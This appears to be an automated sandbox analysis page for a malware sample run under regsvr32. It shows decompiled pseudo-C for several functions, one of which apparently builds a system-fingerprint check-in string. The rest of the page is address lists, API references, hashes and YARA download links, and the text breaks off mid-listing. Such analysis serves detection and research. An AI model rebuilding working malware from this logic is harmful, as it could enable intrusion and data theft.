                                                                                                                                                                                                                                    Function 023EA279, Relevance: 34.7, APIs: 23, Instructions: 201memorystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 66%
                                                                                                                                                                                                                                    			E023EA279(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x23ed018; // 0x99d5691b
				asm("bswap eax");
				_t27 =  *0x23ed014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x23ed010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x23ed00c; // 0x62819102
				asm("bswap eax");
				_t30 =  *0x23ed27c; // 0x28da5a8
				_t3 = _t30 + 0x23ee633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d14b, _t29, _t28, _t27, _t26,  *0x23ed02c,  *0x23ed004, _t25);
				_t33 = E023E1C1A();
				_t34 =  *0x23ed27c; // 0x28da5a8
				_t4 = _t34 + 0x23ee673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E023E54BC(_t91);
				if(_t96 != 0) {
					_t83 =  *0x23ed27c; // 0x28da5a8
					_t6 = _t83 + 0x23ee8eb; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x23ed238, 0, _t96);
				}
				_t97 = E023E7649();
				if(_t97 != 0) {
					_t78 =  *0x23ed27c; // 0x28da5a8
					_t8 = _t78 + 0x23ee8f3; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x23ed238, 0, _t97);
				}
				_t98 =  *0x23ed32c; // 0x4cc95b0
				_a32 = E023E9395(0x23ed00a, _t98 + 4);
				_t42 =  *0x23ed2cc; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x23ed27c; // 0x28da5a8
					_t11 = _t74 + 0x23ee8cd; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x23ed2c8; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x23ed27c; // 0x28da5a8
					_t13 = _t71 + 0x23ee8c6; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x23ed238, 0, 0x800);
					if(_t100 != 0) {
						E023E7A80(GetTickCount());
						_t50 =  *0x23ed32c; // 0x4cc95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x23ed32c; // 0x4cc95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x23ed32c; // 0x4cc95b0
						_t103 = E023E8307(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x23ec2ac);
							_push(_t103);
							_t62 = E023E3CC8();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E023E1199(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E023EA1B0();
								}
								HeapFree( *0x23ed238, 0, _v44);
							}
							HeapFree( *0x23ed238, 0, _t103);
						}
						HeapFree( *0x23ed238, 0, _t100);
					}
					HeapFree( *0x23ed238, 0, _a24);
				}
				HeapFree( *0x23ed238, 0, _t105);
				return _a12;
			}
















































                                                                                                                                                                                                                                    0x023ea279
                                                                                                                                                                                                                                    0x023ea279
                                                                                                                                                                                                                                    0x023ea279
                                                                                                                                                                                                                                    0x023ea280
                                                                                                                                                                                                                                    0x023ea286
                                                                                                                                                                                                                                    0x023ea28e
                                                                                                                                                                                                                                    0x023ea290
                                                                                                                                                                                                                                    0x023ea290
                                                                                                                                                                                                                                    0x023ea29d
                                                                                                                                                                                                                                    0x023ea2a8
                                                                                                                                                                                                                                    0x023ea2ab
                                                                                                                                                                                                                                    0x023ea2b6
                                                                                                                                                                                                                                    0x023ea2b9
                                                                                                                                                                                                                                    0x023ea2be
                                                                                                                                                                                                                                    0x023ea2c1
                                                                                                                                                                                                                                    0x023ea2c6
                                                                                                                                                                                                                                    0x023ea2c9
                                                                                                                                                                                                                                    0x023ea2d5
                                                                                                                                                                                                                                    0x023ea2e2
                                                                                                                                                                                                                                    0x023ea2e4
                                                                                                                                                                                                                                    0x023ea2ea
                                                                                                                                                                                                                                    0x023ea2ef
                                                                                                                                                                                                                                    0x023ea2fa
                                                                                                                                                                                                                                    0x023ea2fc
                                                                                                                                                                                                                                    0x023ea2ff
                                                                                                                                                                                                                                    0x023ea306
                                                                                                                                                                                                                                    0x023ea30a
                                                                                                                                                                                                                                    0x023ea30c
                                                                                                                                                                                                                                    0x023ea311
                                                                                                                                                                                                                                    0x023ea31d
                                                                                                                                                                                                                                    0x023ea31f
                                                                                                                                                                                                                                    0x023ea32b
                                                                                                                                                                                                                                    0x023ea32d
                                                                                                                                                                                                                                    0x023ea32d
                                                                                                                                                                                                                                    0x023ea338
                                                                                                                                                                                                                                    0x023ea33c
                                                                                                                                                                                                                                    0x023ea33e
                                                                                                                                                                                                                                    0x023ea343
                                                                                                                                                                                                                                    0x023ea34f
                                                                                                                                                                                                                                    0x023ea351
                                                                                                                                                                                                                                    0x023ea35d
                                                                                                                                                                                                                                    0x023ea35f
                                                                                                                                                                                                                                    0x023ea35f
                                                                                                                                                                                                                                    0x023ea365
                                                                                                                                                                                                                                    0x023ea378
                                                                                                                                                                                                                                    0x023ea37c
                                                                                                                                                                                                                                    0x023ea383
                                                                                                                                                                                                                                    0x023ea386
                                                                                                                                                                                                                                    0x023ea38b
                                                                                                                                                                                                                                    0x023ea396
                                                                                                                                                                                                                                    0x023ea398
                                                                                                                                                                                                                                    0x023ea39b
                                                                                                                                                                                                                                    0x023ea39b
                                                                                                                                                                                                                                    0x023ea39d
                                                                                                                                                                                                                                    0x023ea3a4
                                                                                                                                                                                                                                    0x023ea3a7
                                                                                                                                                                                                                                    0x023ea3ac
                                                                                                                                                                                                                                    0x023ea3b6
                                                                                                                                                                                                                                    0x023ea3b8
                                                                                                                                                                                                                                    0x023ea3c0
                                                                                                                                                                                                                                    0x023ea3d9
                                                                                                                                                                                                                                    0x023ea3dd
                                                                                                                                                                                                                                    0x023ea3e9
                                                                                                                                                                                                                                    0x023ea3ee
                                                                                                                                                                                                                                    0x023ea3f7
                                                                                                                                                                                                                                    0x023ea408
                                                                                                                                                                                                                                    0x023ea40c
                                                                                                                                                                                                                                    0x023ea415
                                                                                                                                                                                                                                    0x023ea41b
                                                                                                                                                                                                                                    0x023ea428
                                                                                                                                                                                                                                    0x023ea435
                                                                                                                                                                                                                                    0x023ea43b
                                                                                                                                                                                                                                    0x023ea447
                                                                                                                                                                                                                                    0x023ea44d
                                                                                                                                                                                                                                    0x023ea44e
                                                                                                                                                                                                                                    0x023ea455
                                                                                                                                                                                                                                    0x023ea459
                                                                                                                                                                                                                                    0x023ea45f
                                                                                                                                                                                                                                    0x023ea466
                                                                                                                                                                                                                                    0x023ea46d
                                                                                                                                                                                                                                    0x023ea473
                                                                                                                                                                                                                                    0x023ea47a
                                                                                                                                                                                                                                    0x023ea47e
                                                                                                                                                                                                                                    0x023ea489
                                                                                                                                                                                                                                    0x023ea490
                                                                                                                                                                                                                                    0x023ea494
                                                                                                                                                                                                                                    0x023ea49d
                                                                                                                                                                                                                                    0x023ea49d
                                                                                                                                                                                                                                    0x023ea4ae
                                                                                                                                                                                                                                    0x023ea4ae
                                                                                                                                                                                                                                    0x023ea4bd
                                                                                                                                                                                                                                    0x023ea4bd
                                                                                                                                                                                                                                    0x023ea4cc
                                                                                                                                                                                                                                    0x023ea4cc
                                                                                                                                                                                                                                    0x023ea4de
                                                                                                                                                                                                                                    0x023ea4de
                                                                                                                                                                                                                                    0x023ea4ed
                                                                                                                                                                                                                                    0x023ea4fe

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 023EA290
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023EA2DD
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023EA2FA
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023EA31D
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 023EA32D
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023EA34F
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 023EA35F
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023EA396
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023EA3B6
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 023EA3D3
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 023EA3E3
                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(04CC9570), ref: 023EA3F7
                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(04CC9570), ref: 023EA415
                                                                                                                                                                                                                                      • Part of subcall function 023E8307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,73FCC740,?,?,023EA428,?,04CC95B0), ref: 023E8332
                                                                                                                                                                                                                                      • Part of subcall function 023E8307: lstrlen.KERNEL32(?,?,?,023EA428,?,04CC95B0), ref: 023E833A
                                                                                                                                                                                                                                      • Part of subcall function 023E8307: strcpy.NTDLL ref: 023E8351
                                                                                                                                                                                                                                      • Part of subcall function 023E8307: lstrcat.KERNEL32(00000000,?), ref: 023E835C
                                                                                                                                                                                                                                      • Part of subcall function 023E8307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,023EA428,?,04CC95B0), ref: 023E8379
                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000000,023EC2AC,?,04CC95B0), ref: 023EA447
                                                                                                                                                                                                                                      • Part of subcall function 023E3CC8: lstrlen.KERNEL32(04CC87FA,00000000,00000000,73FCC740,023EA453,00000000), ref: 023E3CD8
                                                                                                                                                                                                                                      • Part of subcall function 023E3CC8: lstrlen.KERNEL32(?), ref: 023E3CE0
                                                                                                                                                                                                                                      • Part of subcall function 023E3CC8: lstrcpy.KERNEL32(00000000,04CC87FA), ref: 023E3CF4
                                                                                                                                                                                                                                      • Part of subcall function 023E3CC8: lstrcat.KERNEL32(00000000,?), ref: 023E3CFF
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 023EA466
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 023EA46D
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 023EA47A
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 023EA47E
                                                                                                                                                                                                                                      • Part of subcall function 023E1199: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,76D681D0), ref: 023E124B
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 023EA4AE
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 023EA4BD
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,04CC95B0), ref: 023EA4CC
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 023EA4DE
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 023EA4ED
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3080378247-0
                                                                                                                                                                                                                                    • Opcode ID: 69286a1d5df9a390a3aff977d82c54cd787fe296aa8774d169af910e5aced74b
                                                                                                                                                                                                                                    • Instruction ID: 4592b68a48222493167e1e559cec45c784c6f9be8c4c6ca0dc70383a95153d5e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69286a1d5df9a390a3aff977d82c54cd787fe296aa8774d169af910e5aced74b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 996197B1980218EFCF319B64EC48F5A77ECEB48714F050815F90ADA2D0DB36E92D9B61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023EADE5, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                                                                                                    			E023EADE5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x23e0000;
				_t115 = _t139[3] + 0x23e0000;
				_t131 = _t139[4] + 0x23e0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x23e0000;
				_v16 = _t139[5] + 0x23e0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x23e0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x23ed1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x23ed1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x23ed1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x23ed19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x23ed1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x23ed198; // 0x0
										 *_t102 = _t125;
										 *0x23ed198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x23ed19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

































                                                                                                                                                                                                                                    0x023eadf4
                                                                                                                                                                                                                                    0x023eae0a
                                                                                                                                                                                                                                    0x023eae10
                                                                                                                                                                                                                                    0x023eae12
                                                                                                                                                                                                                                    0x023eae17
                                                                                                                                                                                                                                    0x023eae1d
                                                                                                                                                                                                                                    0x023eae22
                                                                                                                                                                                                                                    0x023eae25
                                                                                                                                                                                                                                    0x023eae33
                                                                                                                                                                                                                                    0x023eae3a
                                                                                                                                                                                                                                    0x023eae3d
                                                                                                                                                                                                                                    0x023eae40
                                                                                                                                                                                                                                    0x023eae41
                                                                                                                                                                                                                                    0x023eae44
                                                                                                                                                                                                                                    0x023eae47
                                                                                                                                                                                                                                    0x023eae4a
                                                                                                                                                                                                                                    0x023eae4f
                                                                                                                                                                                                                                    0x023eae5e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023eae64
                                                                                                                                                                                                                                    0x023eae6e
                                                                                                                                                                                                                                    0x023eae78
                                                                                                                                                                                                                                    0x023eae7d
                                                                                                                                                                                                                                    0x023eae7f
                                                                                                                                                                                                                                    0x023eae89
                                                                                                                                                                                                                                    0x023eae8c
                                                                                                                                                                                                                                    0x023eae8f
                                                                                                                                                                                                                                    0x023eae95
                                                                                                                                                                                                                                    0x023eae97
                                                                                                                                                                                                                                    0x023eae97
                                                                                                                                                                                                                                    0x023eae9a
                                                                                                                                                                                                                                    0x023eae9d
                                                                                                                                                                                                                                    0x023eaea2
                                                                                                                                                                                                                                    0x023eaea6
                                                                                                                                                                                                                                    0x023eaeb9
                                                                                                                                                                                                                                    0x023eaebb
                                                                                                                                                                                                                                    0x023eaf63
                                                                                                                                                                                                                                    0x023eaf63
                                                                                                                                                                                                                                    0x023eaf6a
                                                                                                                                                                                                                                    0x023eaf6d
                                                                                                                                                                                                                                    0x023eaf77
                                                                                                                                                                                                                                    0x023eaf77
                                                                                                                                                                                                                                    0x023eaf7b
                                                                                                                                                                                                                                    0x023eaff9
                                                                                                                                                                                                                                    0x023eaffc
                                                                                                                                                                                                                                    0x023eaffe
                                                                                                                                                                                                                                    0x023eaffe
                                                                                                                                                                                                                                    0x023eb005
                                                                                                                                                                                                                                    0x023eb007
                                                                                                                                                                                                                                    0x023eb011
                                                                                                                                                                                                                                    0x023eb014
                                                                                                                                                                                                                                    0x023eb017
                                                                                                                                                                                                                                    0x023eb017
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023eaf7d
                                                                                                                                                                                                                                    0x023eaf80
                                                                                                                                                                                                                                    0x023eafae
                                                                                                                                                                                                                                    0x023eafb8
                                                                                                                                                                                                                                    0x023eafbc
                                                                                                                                                                                                                                    0x023eafc4
                                                                                                                                                                                                                                    0x023eafc7
                                                                                                                                                                                                                                    0x023eafce
                                                                                                                                                                                                                                    0x023eafd8
                                                                                                                                                                                                                                    0x023eafd8
                                                                                                                                                                                                                                    0x023eafdc
                                                                                                                                                                                                                                    0x023eafe1
                                                                                                                                                                                                                                    0x023eaff0
                                                                                                                                                                                                                                    0x023eaff6
                                                                                                                                                                                                                                    0x023eaff6
                                                                                                                                                                                                                                    0x023eafdc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023eaf87
                                                                                                                                                                                                                                    0x023eaf8a
                                                                                                                                                                                                                                    0x023eaf92
                                                                                                                                                                                                                                    0x023eafa7
                                                                                                                                                                                                                                    0x023eafac
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023eafac
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023eaf92
                                                                                                                                                                                                                                    0x023eaf80
                                                                                                                                                                                                                                    0x023eaf7b
                                                                                                                                                                                                                                    0x023eaec1
                                                                                                                                                                                                                                    0x023eaec8
                                                                                                                                                                                                                                    0x023eaed8
                                                                                                                                                                                                                                    0x023eaee1
                                                                                                                                                                                                                                    0x023eaee5
                                                                                                                                                                                                                                    0x023eaf28
                                                                                                                                                                                                                                    0x023eaf34
                                                                                                                                                                                                                                    0x023eaf5d
                                                                                                                                                                                                                                    0x023eaf36
                                                                                                                                                                                                                                    0x023eaf3a
                                                                                                                                                                                                                                    0x023eaf40
                                                                                                                                                                                                                                    0x023eaf48
                                                                                                                                                                                                                                    0x023eaf4a
                                                                                                                                                                                                                                    0x023eaf4d
                                                                                                                                                                                                                                    0x023eaf53
                                                                                                                                                                                                                                    0x023eaf55
                                                                                                                                                                                                                                    0x023eaf55
                                                                                                                                                                                                                                    0x023eaf48
                                                                                                                                                                                                                                    0x023eaf3a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023eaf34
                                                                                                                                                                                                                                    0x023eaeed
                                                                                                                                                                                                                                    0x023eaef0
                                                                                                                                                                                                                                    0x023eaef7
                                                                                                                                                                                                                                    0x023eaf07
                                                                                                                                                                                                                                    0x023eaf0a
                                                                                                                                                                                                                                    0x023eaf1a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023eaf20
                                                                                                                                                                                                                                    0x023eaf01
                                                                                                                                                                                                                                    0x023eaf05
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023eaf05
                                                                                                                                                                                                                                    0x023eaed2
                                                                                                                                                                                                                                    0x023eaed6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023eaed6
                                                                                                                                                                                                                                    0x023eaeaf
                                                                                                                                                                                                                                    0x023eaeb3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 023EAE5E
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 023EAEDB
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 023EAEE7
                                                                                                                                                                                                                                    • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 023EAF1A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                                    • API String ID: 948315288-3993045852
                                                                                                                                                                                                                                    • Opcode ID: 0eb6c42081531bae05f3da56506960c9cb43775ee35529837218407448ade23a
                                                                                                                                                                                                                                    • Instruction ID: 1776f57e9e1476c7ac0cb86f5fdf5584377fd331b29979ed3c7ebe2363b272bf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0eb6c42081531bae05f3da56506960c9cb43775ee35529837218407448ade23a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32811BB5A40319DFDF21CF98D884BADB7F9BB48714F108429E516E7280EB70E94ACB51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E816C, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 27%
                                                                                                                                                                                                                                    			E023E816C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x23ed33c; // 0x4cc9bc8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E023E70F5(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x23ec1ac;
				}
				_t46 = E023E8022(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E023E2049(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x23ed27c; // 0x28da5a8
						_t16 = _t75 + 0x23eeb28; // 0x530025
						 *0x23ed11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E023E70F5(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x23ec1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E023E2049(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E023E9039(_v20);
						} else {
							_t66 =  *0x23ed27c; // 0x28da5a8
							_t31 = _t66 + 0x23eec48; // 0x73006d
							 *0x23ed11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E023E9039(_v12);
				}
				return _v24;
			}




























                                                                                                                                                                                                                                    0x023e8174
                                                                                                                                                                                                                                    0x023e817a
                                                                                                                                                                                                                                    0x023e8181
                                                                                                                                                                                                                                    0x023e8187
                                                                                                                                                                                                                                    0x023e818b
                                                                                                                                                                                                                                    0x023e818f
                                                                                                                                                                                                                                    0x023e8192
